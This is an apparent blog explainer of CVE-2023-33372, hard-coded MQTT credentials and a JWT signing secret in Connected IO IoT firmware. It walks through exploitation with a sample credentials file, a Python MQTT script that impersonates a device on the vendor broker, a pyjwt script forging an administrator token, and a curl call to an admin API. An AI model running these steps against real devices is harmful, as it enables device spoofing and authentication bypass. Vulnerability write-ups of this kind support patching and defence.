In today’s world, Internet of Things (IoT) devices are used everywhere — from factories to smart homes. But a recent flaw, CVE-2023-33372, found in _Connected IO_ (up to v2.1.), shows how things can go seriously wrong when device firmware relies on hard-coded usernames and passwords for communication. Researchers discovered that anyone with access to the firmware could snatch these credentials, connect to the device’s MQTT broker, impersonate devices, and even forge authentication using JWT tokens.
This post will break down what happened, how it works, and why it matters — with code snippets, explanations, and reference links so you can see the details for yourself.
What does this mean?
When a device has a username and password built into its firmware, anyone who can get a copy (say, via a firmware update download or extracting from the hardware) can read those secrets. Worse yet, if these are used to connect to central services — like an MQTT broker (a popular IoT messaging system) — that means attackers can pose as legitimate devices.
Here, the firmware didn’t just store hard-coded MQTT credentials. It also contained the secret key used to sign and verify JWT tokens (used for web sessions and API access). Anyone with these could bypass authentication.
Step 1: Extracting the Credentials
The username/password pair and JWT signing secret were stored right in the firmware, usually in plaintext or simple obfuscation.
Say, in /etc/config.json (representative example)
{
"mqtt_user": "connectedio",
"mqtt_pass": "SuperSecret123!",
"jwt_secret": "MyVerySecretJWTKey!"
}
Step 2: Hijacking the MQTT Broker
MQTT (Message Queuing Telemetry Transport) is the protocol devices use to send and receive messages. With the discovered MQTT credentials, an attacker can connect as if they are a legitimate device, listen in, send fake commands, or impersonate others.
Here’s an actual Python snippet using the widely-used Paho MQTT library
import paho.mqtt.client as mqtt
broker = "broker.connectedio.com"
port = 1883
username = "connectedio"
password = "SuperSecret123!"
client = mqtt.Client(client_id="stolen_device_id")
client.username_pw_set(username, password)
client.connect(broker, port=port)
# Subscribe or publish as a legitimate device
client.publish("devices/123/status", "online")
client.disconnect()
Reads private device messages.
- Spoofs device data/commands.
Triggers actions on the server ("turn on", "run update", etc).
### Step 3: Forging JWT Tokens to Bypass Web/API Authentication
JWT (JSON Web Tokens) are used for session authentication. The server uses a secret key (found in the firmware as jwt_secret) to both sign and verify tokens.
With the secret key, attackers can create _arbitrary valid tokens_ — impersonating any user or device!
Example: Crafting a JWT
Install pyjwt:
pip install pyjwt
Create a fake admin JWT
import jwt
import datetime
jwt_secret = "MyVerySecretJWTKey!"
payload = {
"user": "admin",
"role": "administrator",
"exp": datetime.datetime.utcnow() + datetime.timedelta(hours=1),
}
token = jwt.encode(payload, jwt_secret, algorithm="HS256")
print(token)
Use this token to call protected web endpoints, bypassing authentication entirely
curl -H "Authorization: Bearer <token_here>" https://web.connectedio.com/api/admin
Total authentication bypass: All session and admin access can be forged.
Even those who "change their password" are stuck — since the root problem is the secret embedded in every device.
Mitigations
- Patch your devices: Contact Connected IO for updates beyond v2.1. that rotate and randomize credentials per install.
References and Further Reading
- Official CVE Entry: CVE-2023-33372
- MQTT Security Best Practices (HiveMQ)
- JWT Attacks & How to Prevent Them (Auth)
- OWASP: Insecure Storage
Final Words
This flaw is a textbook example of why hard-coded passwords and secrets must never be used in embedded systems. Firmware updates should ensure secrets are randomized and stored securely — and MQTT brokers must enforce strict access controls.
For anyone running _Connected IO_ devices: Check your version and update now. Leaving this vulnerability unpatched exposes your infrastructure to complete compromise.
Timeline
Published on: 08/04/2023 18:15:00 UTC
Last modified on: 08/08/2023 19:54:00 UTC